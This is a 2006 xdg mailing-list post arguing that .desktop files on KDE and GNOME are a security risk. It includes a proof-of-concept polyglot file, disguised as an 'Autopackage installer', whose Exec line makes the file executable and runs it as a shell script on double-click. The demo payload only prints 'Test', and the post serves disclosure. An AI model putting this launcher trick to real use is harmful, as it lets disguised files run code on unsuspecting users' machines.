Security issue with .desktop files revisited

Francois Gouget fgouget at
Tue Mar 28 19:52:21 EEST 2006

Mike Hearn wrote:
> Francois Gouget wrote:
>> Right. So now tools like wget (and shells, see below) have to know 
>> about KDE/Gnome internal concepts like desktop files! And you 
>> criticize Windows design?
> Not really, anything is better than nothing - does Firefox set the 
> "unsafe" EA on Windows?

At least Windows does not require Firefox to know about .lnk, .cmd and 
.pif files.

> and the problem that 
> started this thread off is that KDE and GNOME can represent a .desktop 
> file as pretty much any kind of file (jpeg, ms word doc, whatever).

> You can't execute .desktop files even if they are marked as +x from the 
> command line, as there is no binfmt handler for them.

First, who said that worm writers are not allowed to call their ELF 
creations 'myworm.desktop'? What you are doing is saving them the 
trouble of having to find a way to make their worm executable (this 
reminds me of Sony's rootkit now).

Second, care to try this one out? Recognize something?

--- cut here ---
[ <<[EOF] ] # autopackage ]
[Desktop Entry]
Name=Install SuperChromotastic
Exec=/bin/sh -c 'set -x;chmod +x `echo %k | sed -e "s!file://!!" ` ; 
`echo %k | sed -e "s!file://!!"`; read'
Comment=Double-click me!
GenericName=Autopackage installer for SuperChromotastic 1.0


[ true ]
x0=`clear > /dev/tty`
x1=`echo Test > /dev/tty`
x2=`echo Press Enter twice > /dev/tty`
--- cut here ---

Note: For some reason the pipes did not work in the Exec line on Gnome 
2.2 so I changed them to exclamation marks.

Francois Gouget
fgouget at

More information about the xdg mailing list